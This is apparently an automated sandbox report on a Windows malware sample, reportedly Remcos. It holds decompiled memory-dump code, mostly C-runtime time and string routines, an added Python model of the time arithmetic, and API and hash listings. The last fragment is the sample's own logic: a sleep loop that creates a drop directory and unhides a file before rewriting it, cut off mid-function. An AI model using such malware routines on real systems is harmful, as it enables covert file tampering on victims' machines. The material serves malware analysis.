                    					__eflags =  *_t145 - 0x93406fff;              // low dword vs 0x93406fff
                    					if(__eflags > 0) {
                    						goto L10;
                    					}
                    				}
                    				E105D3F0C(0, _t145, _t155, __eflags);             // __tzset()
                    				_v12 = 0;                                          // daylight
                    				_v16 = 0;                                          // dstbias
                    				_v8 = 0;                                           // timezone
                    				_t67 = E105D3741( &_v12);                          // _get_daylight(&daylight)
                    				_pop(_t125);
                    				__eflags = _t67;
                    				if(_t67 == 0) {
                    					_t75 = E105D376D( &_v16);                      // _get_dstbias(&dstbias)
                    					_pop(_t125);
                    					__eflags = _t75;
                    					if(_t75 == 0) {
                    						_t77 = E105D3799( &_v8);                   // _get_timezone(&timezone)
                    						_pop(_t125);
                    						__eflags = _t77;
                    						if(_t77 == 0) {
                    							_t118 =  *(_t145 + 4);                 // high dword of *ptime
                    							_t128 =  *_t145;                       // low dword of *ptime
                    							__eflags = _t118;
                    							if(__eflags < 0) {
                    								L28:                                               // edge path: *ptime within 3 days of 0 or of _MAX__TIME64_T
                    								_push(_t145);
                    								_push(_t155);
                    								_t78 = E105CD545();                                // _gmtime64_s(ptm, ptime)
                    								__eflags = _t78;
                    								if(_t78 != 0) {
                    									goto L11;
                    								}
                    								__eflags = _v12;                                   // daylight?
                    								asm("cdq");
                    								_t147 =  *_t155;                                   // ptm->tm_sec, sign-extended to 64 bits
                    								_t120 = _t139;
                    								if(__eflags == 0) {
                    									L32:
                    									_t80 = _v8;                                    // offset = timezone
                    									L33:
                    									asm("cdq");
                    									_t148 = _t147 - _t80;                          // ltime = tm_sec - offset (64-bit)
                    									asm("sbb ebx, edx");
                    									_t81 = E105E1ADE(_t148, _t120, 0x3c, 0);       // __allrem(ltime, 60)
                    									 *_t155 = _t81;                                // tm_sec = ltime % 60
                    									__eflags = _t81;
                    									if(_t81 < 0) {                                 // C remainder keeps the sign of ltime
                    										_t148 = _t148 + 0xffffffc4;                // ltime -= 60
                    										 *_t155 = _t81 + 0x3c;                     // tm_sec += 60
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t82 = E105E1A2E(_t148, _t120, 0x3c, 0);       // __alldiv(ltime, 60)
                    									_t121 = _t139;
                    									_t28 = _t155 + 4;                              // &ptm->tm_min
                    									asm("cdq");
                    									_t150 = _t82 +  *_t28;                         // ltime = tm_min + ltime / 60
                    									asm("adc ebx, edx");
                    									_t84 = E105E1ADE(_t150, _t139, 0x3c, 0);       // __allrem(ltime, 60)
                    									 *(_t155 + 4) = _t84;                          // tm_min = ltime % 60
                    									__eflags = _t84;
                    									if(_t84 < 0) {
                    										_t150 = _t150 + 0xffffffc4;                // ltime -= 60
                    										 *(_t155 + 4) = _t84 + 0x3c;               // tm_min += 60
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t85 = E105E1A2E(_t150, _t121, 0x3c, 0);       // __alldiv(ltime, 60)
                    									_t122 = _t139;
                    									_t31 = _t155 + 8;                              // &ptm->tm_hour
                    									asm("cdq");
                    									_t152 = _t85 +  *_t31;                         // ltime = tm_hour + ltime / 60
                    									asm("adc ebx, edx");
                    									_t87 = E105E1ADE(_t152, _t139, 0x18, 0);       // __allrem(ltime, 24)
                    									 *(_t155 + 8) = _t87;                          // tm_hour = ltime % 24
                    									__eflags = _t87;
                    									if(_t87 < 0) {
                    										_t152 = _t152 + 0xffffffe8;                // ltime -= 24
                    										 *(_t155 + 8) = _t87 + 0x18;               // tm_hour += 24
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t131 = E105E1A2E(_t152, _t122, 0x18, 0);      // days = ltime / 24 (edx:eax = high:low dword)
                    									__eflags = _t139;
                    									if(__eflags < 0) {                             // days < 0
                    										L48:
                    										_t44 = _t155 + 0x18;                           // &ptm->tm_wday
                    										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;     // tm_mday += days
                    										asm("cdq");
                    										_t153 = 7;
                    										_t51 = _t155 + 0xc;                            // &ptm->tm_mday
                    										_t93 =  *_t51;
                    										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;   // tm_wday = (tm_wday + 7 + days) % 7
                    										__eflags = _t93;
                    										if(_t93 > 0) {                                 // still inside the month: only tm_yday moves
                    											goto L43;
                    										}
                    										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;           // tm_mon = 11 (December of the previous year)
                    										 *(_t155 + 0xc) = _t93 + 0x1f;                 // tm_mday += 31
                    										_t55 = _t131 + 0x16d;                          // days + 365
                    										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;    // tm_yday += days + 365
                    										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;   // tm_year--
                    										goto L44;
                    									} else {
                    										if(__eflags > 0) {                             // days > 0
                    											L42:
                    											_t34 = _t155 + 0x18;                       // &ptm->tm_wday
                    											asm("cdq");
                    											_t154 = 7;
                    											_t39 = _t155 + 0xc;
                    											 *_t39 =  *(_t155 + 0xc) + _t131;          // tm_mday += days
                    											__eflags =  *_t39;
                    											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;   // tm_wday = (tm_wday + days) % 7
                    											L43:
                    											_t42 = _t155 + 0x1c;
                    											 *_t42 =  *(_t155 + 0x1c) + _t131;         // tm_yday += days
                    											__eflags =  *_t42;
                    											L44:
                    											_t78 = 0;                                  // success
                    											goto L11;
                    										}
                    										}
                    										__eflags = _t131;
                    										if(_t131 == 0) {
                    											__eflags = _t139;
                    											if(__eflags > 0) {
                    												goto L44;
                    											}
                    											if(__eflags < 0) {
                    												goto L48;
                    											}
                    											__eflags = _t131;
                    											if(_t131 >= 0) {
                    												goto L44;
                    											}
                    											goto L48;
                    										}
                    										goto L42;
                    									}
                    								}
                    								_push(_t155);
                    								_t102 = E105D3F5D(_t120, _t147, _t155, __eflags);  // _isindst(ptm)
                    								__eflags = _t102;
                    								if(_t102 == 0) {
                    									goto L32;
                    								}
                    								_t80 = _v8 + _v16;                                 // offset = timezone + dstbias
                    								 *((intOrPtr*)(_t155 + 0x20)) = 1;                 // tm_isdst = 1
                    								goto L33;
                    							}
                    							if(__eflags > 0) {
                    								L20:
                    								_t104 = 7;
                    								__eflags = _t118 - _t104;                          // high dword of *ptime vs 7
                    								if(__eflags > 0) {
                    									goto L28;
                    								}
                    								if(__eflags < 0) {
                    									L23:                                           // in-range path: 3 days < *ptime < _MAX__TIME64_T - 3 days
                    									asm("cdq");
                    									_push( &_v24);
                    									asm("sbb ebx, edx");
                    									_v24 = _t128 - _v8;                            // ltime = *ptime - timezone (64-bit in _v24:_v20)
                    									_push(_t155);
                    									_v20 = _t118;
                    									_t78 = E105CD545();                            // _gmtime64_s(ptm, &ltime)
                    									__eflags = _t78;
                    									if(_t78 != 0) {
                    										goto L11;
                    									}
                    									__eflags = _v12 - _t78;                        // daylight == 0?
                    									if(__eflags == 0) {
                    										goto L44;
                    									}
                    									_push(_t155);
                    									_t107 = E105D3F5D(_t118, _t145, _t155, __eflags);  // _isindst(ptm)
                    									__eflags = _t107;
                    									if(_t107 == 0) {
                    										goto L44;
                    									}
                    									asm("cdq");
                    									_v24 = _v24 - _v16;                            // ltime -= dstbias
                    									_push( &_v24);
                    									asm("sbb [ebp-0x10], edx");
                    									_push(_t155);
                    									_t78 = E105CD545();                            // _gmtime64_s(ptm, &ltime) again with the DST offset applied
                    									__eflags = _t78;
                    									if(_t78 != 0) {
                    										goto L11;
                    									}
                    									 *((intOrPtr*)(_t155 + 0x20)) = 1;             // tm_isdst = 1
                    									goto L44;
                    								}
                    								__eflags = _t128 - 0x933c7b7f;                     // low dword of _MAX__TIME64_T - 3 * 86400 = 0x933c7b7f
                    								if(_t128 >= 0x933c7b7f) {
                    									goto L28;
                    								}
                    								goto L23;
                    							}
                    							__eflags = _t128 - 0x3f480;                            // 3 * 86400 = 0x3f480 (high dword is 0 here)
                    							if(_t128 <= 0x3f480) {
                    								goto L28;
                    							}
                    							goto L20;
                    						}
                    					}
                    				}
                    				// Bytes after the function's last return, appended by the decompiler: a parameter-validation
                    				// stub (E105C77F8 called with five zero arguments, then int3 padding), followed by code that
                    				// matches the CRT's _localtime64(const __time64_t *ptime) wrapper around the function above.
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				E105C77F8();
                    				asm("int3");
                    				_push(_t155);
                    				_t69 = E105CD4E0(_t125);                          // __getgmtimebuf(): per-thread struct tm
                    				_t156 = _t69;
                    				__eflags = _t156;
                    				if(_t156 != 0) {
                    					_push(_v0);
                    					_t70 = E105C6607(0, _t139, _t145, _t156);     // _localtime64_s(ptm, ptime)
                    					asm("sbb eax, eax");
                    					_t73 =  !( ~_t70) & _t156;                    // return ptm when the error code is 0, NULL otherwise
                    					__eflags = _t73;
                    					return _t73;
                    				}
                    				return _t69;                                      // NULL: no per-thread buffer
                    			}
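The carry arithmetic in the routine above is easier to check when written out. What follows is an added example, not code from this report or from the sample: a Python model of the edge-range branch of what the decompiled routine matches (the MSVC CRT's _localtime64_s), using the constants visible in the decompilation (60, 24, 7, 31, 365, 3 * 86400 = 0x3f480, 0x793406FFF). All names (Tm, c_div, c_rem, tm_from_gmtime, normalize_tm, localtime64_s_edge) are mine, and the timezone/DST inputs are passed in by the caller instead of being read from the CRT's globals as the real function does.

```python
# Added example: Python model of the decompiled _localtime64_s arithmetic (names are mine,
# not from the sample or the report). Only the edge-range branch carries offsets by hand;
# the in-range branch, like the decompilation, converts (*ptime - timezone) with gmtime.
import time
from dataclasses import dataclass

MAX_TIME64_T = 0x793406FFF   # compared as high dword 7 / low dword 0x93406fff in the decompilation
THREE_DAYS = 3 * 86400       # 0x3f480; low dword of MAX_TIME64_T - THREE_DAYS is 0x933c7b7f


@dataclass
class Tm:
    """struct tm with the field order seen in the decompilation (offsets 0x0 .. 0x20)."""
    sec: int
    min: int
    hour: int
    mday: int
    mon: int      # 0..11
    year: int     # years since 1900
    wday: int     # 0 = Sunday
    yday: int     # 0..365
    isdst: int = 0


def c_div(a: int, b: int) -> int:
    """Truncating division, as the CRT's __alldiv does (Python's // rounds toward -inf)."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def c_rem(a: int, b: int) -> int:
    """Remainder with the sign of the dividend, as __allrem does."""
    return a - b * c_div(a, b)


def tm_from_gmtime(t: int) -> Tm:
    """Stand-in for _gmtime64_s: map Python's struct_time onto C's struct tm conventions."""
    g = time.gmtime(t)
    return Tm(g.tm_sec, g.tm_min, g.tm_hour, g.tm_mday, g.tm_mon - 1,
              g.tm_year - 1900, (g.tm_wday + 1) % 7, g.tm_yday - 1)


def normalize_tm(tm: Tm, timezone: int, daylight: int = 0, dstbias: int = 0,
                 in_dst: bool = False) -> Tm:
    """Labels L33/L42/L43/L48 of the decompilation: subtract the offset from tm_sec and carry
    the result through minutes, hours and days, fixing negative remainders the way C does."""
    ltime = tm.sec - timezone
    if daylight and in_dst:          # the _isindst() check on the decompiled L28 path
        ltime -= dstbias
        tm.isdst = 1
    tm.sec = c_rem(ltime, 60)        # __allrem(ltime, 60)
    if tm.sec < 0:
        tm.sec += 60
        ltime -= 60
    ltime = tm.min + c_div(ltime, 60)
    tm.min = c_rem(ltime, 60)
    if tm.min < 0:
        tm.min += 60
        ltime -= 60
    ltime = tm.hour + c_div(ltime, 60)
    tm.hour = c_rem(ltime, 24)
    if tm.hour < 0:
        tm.hour += 24
        ltime -= 24
    days = c_div(ltime, 24)
    if days > 0:                     # L42 / L43
        tm.mday += days
        tm.wday = c_rem(tm.wday + days, 7)
        tm.yday += days
    elif days < 0:                   # L48
        tm.mday += days
        tm.wday = c_rem(tm.wday + 7 + days, 7)
        if tm.mday > 0:              # goto L43
            tm.yday += days
        else:                        # fell off the front of January: December of the previous year
            tm.mon = 11
            tm.mday += 31
            tm.yday += days + 365
            tm.year -= 1
    return tm


def localtime64_s_edge(t: int, timezone: int, daylight: int = 0, dstbias: int = 0,
                       in_dst: bool = False) -> Tm:
    """Mirror the decompiled control flow: EINVAL outside [0, MAX_TIME64_T], plain gmtime of
    the shifted value in the wide middle range, hand-carried offsets within 3 days of an edge."""
    if not 0 <= t <= MAX_TIME64_T:
        raise ValueError("EINVAL")   # the decompiled *_errno() = 0x16 paths
    if THREE_DAYS < t < MAX_TIME64_T - THREE_DAYS:
        tm = tm_from_gmtime(t - timezone)
        if daylight and in_dst:      # second _gmtime64_s call with the DST bias applied
            tm = tm_from_gmtime(t - timezone - dstbias)
            tm.isdst = 1
        return tm
    return normalize_tm(tm_from_gmtime(t), timezone, daylight, dstbias, in_dst)


if __name__ == "__main__":
    # Epoch 0 viewed from UTC-5 (timezone = +18000): the carry chain lands on 31 Dec 1969 19:00.
    print(localtime64_s_edge(0, 18000))
```

Running the epoch-0 case by hand through the decompiled labels gives tm_sec 0, tm_min 0, tm_hour -5 (fixed to 19 with ltime -29), days -1, tm_mday 0, and therefore the L48 fallback to 31 December of year 69 with tm_yday 364 and tm_wday 3; the model reproduces exactly that, which is the check that the three __allrem calls and the 0x1f/0x16d constants are the CRT's own month/year roll-back and not sample logic.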

                    APIs
                    • __allrem.LIBCMT ref: 105C6794
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67B0
                    • __allrem.LIBCMT ref: 105C67C7
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C67E5
                    • __allrem.LIBCMT ref: 105C67FC
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 105C681A
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                    • Instruction ID: f86f8c2f23a03435d2efe623d088869510887b1d46028a80942f50565eaedac9
                    • Opcode Fuzzy Hash: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                    • Instruction Fuzzy Hash: 1C810976A007069BE7109EB9CE45B5A7BFDEF88764F11453AF411D7280E770FA418BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __allrem.LIBCMT ref: 00435926
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435942
                    • __allrem.LIBCMT ref: 00435959
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435977
                    • __allrem.LIBCMT ref: 0043598E
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004359AC
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                    • Instruction ID: 35372c1425533dcebe3bda436374fdb164c2facb18fb88ba24de970f82e87be5
                    • Opcode Fuzzy Hash: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                    • Instruction Fuzzy Hash: 4D810972600F06ABE724AE69CC42B6B73E8AF49778F24552FF411D7681E77CD9008798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			// Consistent with the MSVC CRT's __crtLCMapStringA_stat(plocinfo, Locale, dwMapFlags, lpSrcStr, cchSrc,
                    			// lpDestStr, cchDest, code_page, bError): widen the input with MultiByteToWideChar, map it with
                    			// LCMapStringW (E105D34EE), convert the result back with WideCharToMultiByte. CRT library code, not Remcos logic.
                    			E105D545D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				int _v12;
                    				void* _v24;
                    				signed int _t54;
                    				int _t58;
                    				signed int _t60;
                    				short* _t62;
                    				signed int _t66;
                    				short* _t70;
                    				int _t71;
                    				int _t78;
                    				short* _t81;
                    				signed int _t87;
                    				signed int _t90;
                    				void* _t95;
                    				void* _t96;
                    				int _t98;
                    				short* _t101;
                    				int _t103;
                    				signed int _t106;
                    				short* _t107;
                    				void* _t110;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_v8 =  *0x46a00c ^ _t106;                          // /GS stack cookie: __security_cookie ^ ebp, verified by E105C0B89 on return
                    				_push(__esi);
                    				_t103 = _a20;                                      // cchSrc
                    				if(_t103 > 0) {
                    					_t78 = E105D1047(_a16, _t103);                 // strnlen(lpSrcStr, cchSrc)
                    					_t110 = _t78 - _t103;
                    					_t4 = _t78 + 1;
                    					_t103 = _t4;                                   // string shorter than cchSrc: count the terminating NUL too
                    					if(_t110 >= 0) {
                    						_t103 = _t78;
                    					}
                    				}
                    				_t98 = _a32;                                       // code_page
                    				if(_t98 == 0) {
                    					_t98 =  *( *_a4 + 8);                          // default: code page from the locale info (offset 8 of the locinfo struct)
                    					_a32 = _t98;
                    				}
                    				// flags: MB_PRECOMPOSED (1) | MB_ERR_INVALID_CHARS (8) when bError is set; cchWideChar 0 = size query
                    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                    				_v12 = _t54;                                       // wide-char count needed for the input
                    				if(_t54 == 0) {
                    					L38:
                    					return E105C0B89(_v8 ^ _t106);
                    				} else {
                    					_t95 = _t54 + _t54;
                    					_t85 = _t95 + 8;
                    					asm("sbb eax, eax");
                    					if((_t95 + 0x00000008 & _t54) == 0) {
                    						_t81 = 0;
                    						__eflags = 0;
                    						L14:
                    						if(_t81 == 0) {
                    							L36:
                    							_t105 = 0;
                    							L37:
                    							E105C1A0E(_t81);
                    							goto L38;
                    						}
                    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                    						_t121 = _t58;
                    						if(_t58 == 0) {
                    							goto L36;
                    						}
                    						_t100 = _v12;
                    						_t60 = E105D34EE(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                    						_t105 = _t60;
                    						if(_t105 == 0) {
                    							goto L36;
                    						}
                    						if((_a12 & 0x00000400) == 0) {
                    							_t96 = _t105 + _t105;
                    							_t87 = _t96 + 8;
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							__eflags = _t87 & _t60;
                    							if((_t87 & _t60) == 0) {
                    								_t101 = 0;
                    								__eflags = 0;
                    								L30:
                    								__eflags = _t101;
                    								if(__eflags == 0) {
                    									L35:
                    									E105C1A0E(_t101);
                    									goto L36;
                    								}
                    								_t62 = E105D34EE(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                    								__eflags = _t62;
                    								if(_t62 == 0) {
                    									goto L35;
                    								}
                    								_push(0);
                    								_push(0);
                    								__eflags = _a28;
                    								if(_a28 != 0) {
                    									_push(_a28);
                    									_push(_a24);
                    								} else {
                    									_push(0);
                    									_push(0);
                    								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??); // the four "??" are the arguments pushed just above: lpMultiByteStr = _a24, cbMultiByte = _a28 (or 0/0 when _a28 is 0), lpDefaultChar = 0, lpUsedDefaultChar = 0
                    								__eflags = _t105;
                    								if(_t105 != 0) {
                    									E105C1A0E(_t101);
                    									goto L37;
                    								} else {
                    									goto L35;
                    								}
                    							}
                    							_t90 = _t96 + 8;
                    							__eflags = _t96 - _t90;
                    							asm("sbb eax, eax");
                    							_t66 = _t60 & _t90;
                    							_t87 = _t96 + 8;
                    							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) { // 0x400 = _ALLOCA_S_THRESHOLD: _malloca uses the heap above 1024 bytes, the stack below
                    								__eflags = _t96 - _t87;
                    								asm("sbb eax, eax");
                    								_t101 = E105D07FA(_t87, _t66 & _t87);
                    								_pop(_t87);
                    								__eflags = _t101;
                    								if(_t101 == 0) {
                    									goto L35;
                    								}
								 *_t101 = 0xdddd; // _malloca heap marker (_MARKER_HEAP); _freea (E105C1A0E) reads it to decide whether to free
                    								L28:
                    								_t101 =  &(_t101[4]);
                    								goto L30;
                    							}
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							E105E167E();
                    							_t101 = _t107;
                    							__eflags = _t101;
                    							if(_t101 == 0) {
                    								goto L35;
                    							}
							 *_t101 = 0xcccc; // _malloca stack marker (_MARKER_STACK) for the alloca path
                    							goto L28;
                    						}
                    						_t70 = _a28;
                    						if(_t70 == 0) {
                    							goto L37;
                    						}
                    						_t125 = _t105 - _t70;
                    						if(_t105 > _t70) {
                    							goto L36;
                    						}
                    						_t71 = E105D34EE(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                    						_t105 = _t71;
                    						if(_t71 != 0) {
                    							goto L37;
                    						}
                    						goto L36;
                    					}
                    					asm("sbb eax, eax");
                    					_t72 = _t54 & _t95 + 0x00000008;
                    					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) { // same _malloca threshold for the wide-char input buffer
                    						__eflags = _t95 - _t85;
                    						asm("sbb eax, eax");
                    						_t81 = E105D07FA(_t85, _t72 & _t85);
                    						_pop(_t85);
                    						__eflags = _t81;
                    						if(__eflags == 0) {
                    							goto L36;
                    						}
						 *_t81 = 0xdddd; // _MARKER_HEAP
                    						L12:
                    						_t81 =  &(_t81[4]);
                    						goto L14;
                    					}
                    					asm("sbb eax, eax");
                    					E105E167E();
                    					_t81 = _t107;
                    					if(_t81 == 0) {
                    						goto L36;
                    					}
					 *_t81 = 0xcccc; // _MARKER_STACK
                    					goto L12;
                    				}
                    			}
                    0x105d5462
                    0x105d5463
                    0x105d546b
                    0x105d546f
                    0x105d5470
                    0x105d5476
                    0x105d547c
                    0x105d5482
                    0x105d5485
                    0x105d5485
                    0x105d5488
                    0x105d548a
                    0x105d548a
                    0x105d5488
                    0x105d548c
                    0x105d5491
                    0x105d5498
                    0x105d549b
                    0x105d549b
                    0x105d54b7
                    0x105d54bd
                    0x105d54c2
                    0x105d5655
                    0x105d5668
                    0x105d54c8
                    0x105d54c8
                    0x105d54cb
                    0x105d54d0
                    0x105d54d4
                    0x105d5528
                    0x105d5528
                    0x105d552a
                    0x105d552c
                    0x105d564a
                    0x105d564a
                    0x105d564c
                    0x105d564d
                    0x00000000
                    0x105d5653
                    0x105d553d
                    0x105d5543
                    0x105d5545
                    0x00000000
                    0x00000000
                    0x105d554b
                    0x105d555d
                    0x105d5562
                    0x105d5566
                    0x00000000
                    0x00000000
                    0x105d5573
                    0x105d55ad
                    0x105d55b0
                    0x105d55b3
                    0x105d55b5
                    0x105d55b7
                    0x105d55b9
                    0x105d5605
                    0x105d5605
                    0x105d5607
                    0x105d5607
                    0x105d5609
                    0x105d5643
                    0x105d5644
                    0x00000000
                    0x105d5649
                    0x105d561d
                    0x105d5622
                    0x105d5624
                    0x00000000
                    0x00000000
                    0x105d5628
                    0x105d5629
                    0x105d562a
                    0x105d562d
                    0x105d5669
                    0x105d566c
                    0x105d562f
                    0x105d562f
                    0x105d5630
                    0x105d5630
                    0x105d563d
                    0x105d563f
                    0x105d5641
                    0x105d5672
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x105d5641
                    0x105d55bb
                    0x105d55be
                    0x105d55c0
                    0x105d55c2
                    0x105d55c4
                    0x105d55c7
                    0x105d55cc
                    0x105d55e7
                    0x105d55e9
                    0x105d55f3
                    0x105d55f5
                    0x105d55f6
                    0x105d55f8
                    0x00000000
                    0x00000000
                    0x105d55fa
                    0x105d5600
                    0x105d5600
                    0x00000000
                    0x105d5600
                    0x105d55ce
                    0x105d55d0
                    0x105d55d4
                    0x105d55d9
                    0x105d55db
                    0x105d55dd
                    0x00000000
                    0x00000000
                    0x105d55df
                    0x00000000
                    0x105d55df
                    0x105d5575
                    0x105d557a
                    0x00000000
                    0x00000000
                    0x105d5580
                    0x105d5582
                    0x00000000
                    0x00000000
                    0x105d5599
                    0x105d559e
                    0x105d55a2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x105d55a8
                    0x105d54db
                    0x105d54dd
                    0x105d54df
                    0x105d54e7
                    0x105d5506
                    0x105d5508
                    0x105d5512
                    0x105d5514
                    0x105d5515
                    0x105d5517
                    0x00000000
                    0x00000000
                    0x105d551d
                    0x105d5523
                    0x105d5523
                    0x00000000
                    0x105d5523
                    0x105d54eb
                    0x105d54ef
                    0x105d54f4
                    0x105d54f8
                    0x00000000
                    0x00000000
                    0x105d54fe
                    0x00000000
                    0x105d54fe

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,105D56AE,00000001,00000001,00000006), ref: 105D54B7
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,105D56AE,00000001,00000001,00000006), ref: 105D553D
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,0000003B,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 105D5637
                    • __freea.LIBCMT ref: 105D5644
                      • Part of subcall function 105D07FA: RtlAllocateHeap.NTDLL(00000000,?), ref: 105D082C
                    • __freea.LIBCMT ref: 105D564D
                    • __freea.LIBCMT ref: 105D5672
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: 3c8ec32485a0275f0767097eae71f19e74435e9b155a0997f345ceccae632116
                    • Instruction ID: b79e9539ac9b169d89d2ef457e4d81f14bee8f6857640bb2574b1115277b1218
                    • Opcode Fuzzy Hash: 3c8ec32485a0275f0767097eae71f19e74435e9b155a0997f345ceccae632116
                    • Instruction Fuzzy Hash: 4E51C872600316AFDB168F68CC45EAF7FAAEB84698F55462AFD05D7240EB34EC80C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
                    • Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
                    • Opcode Fuzzy Hash: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
                    • Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E10599ADF(void* __ecx, char* __edx) {
                    				char _v1028;
                    				char _v1040;
                    				char _v1064;
                    				char _v1076;
                    				void* _v1080;
                    				void* _v1088;
                    				void* _v1092;
                    				char _v1100;
                    				char _v1124;
                    				void* _v1132;
                    				char _v1136;
                    				void* _v1152;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				signed char _t34;
                    				char* _t36;
                    				void* _t38;
                    				int _t42;
                    				void* _t49;
                    				void* _t53;
                    				void* _t65;
                    				int _t66;
                    				void* _t68;
                    				void* _t74;
                    				void* _t75;
                    				void* _t76;
                    				void* _t83;
                    				signed int _t141;
                    				signed int _t142;
                    				void* _t143;
                    				void* _t144;
                    				signed int _t145;
                    
                    				_t131 = __edx;
                    				_t142 = _t141 & 0xfffffff8;
                    				_t145 = _t142;
                    				_t143 = _t142 - 0x464;
                    				_t83 = __ecx;
                    				_t136 = __ecx + 4;
                    				do {
					Sleep(0x1388); // 0x1388 = 5000 ms: one pass every 5 seconds
					E10599A2E(_t83, _t131); // opens the target file, reads its size and sleeps a further 10 s (0x2710 ms) inside (see the subcall APIs below)
                    					_t131 = 0x45f724;
                    					if(E10598352(_t145) != 0) {
                    						if(E1059AC23() == 0) {
							CreateDirectoryW(E10592D59(0x46c3c8), 0); // create the drop directory when it is missing
                    						}
                    						_t133 = _t83 + 0x60;
                    						_t34 = GetFileAttributesW(E10592D59(_t83 + 0x60));
                    						_t148 = _t34 & 0x00000002;
						if((_t34 & 0x00000002) != 0) { // 0x2 = FILE_ATTRIBUTE_HIDDEN
							SetFileAttributesW(E10592D59(_t133), 0x80); // 0x80 = FILE_ATTRIBUTE_NORMAL: clear the hidden flag before the file is rewritten
                    						}
                    						_t36 = E10592E03(E10592CB7(0x46c578, _t131, _t148, 0x12));
                    						_t149 =  *_t36;
                    						if( *_t36 != 0) {
                    							E10592F43(_t83,  &_v1124);
                    							_t38 = E105932F7();
                    							E105968EA( &_v1028, E10592E03(0x46c560), _t38);
                    							_t42 = PathFileExistsW(E10592D59(_t133));
                    							__eflags = _t42;
                    							if(_t42 != 0) {
                    								E10592F43(_t83,  &_v1100);
                    								_t65 = E10592D59(_t133);
                    								_t131 =  &_v1100;
                    								_t66 = E105A884A(_t65,  &_v1100);
                    								__eflags = _t66;
                    								if(_t66 != 0) {
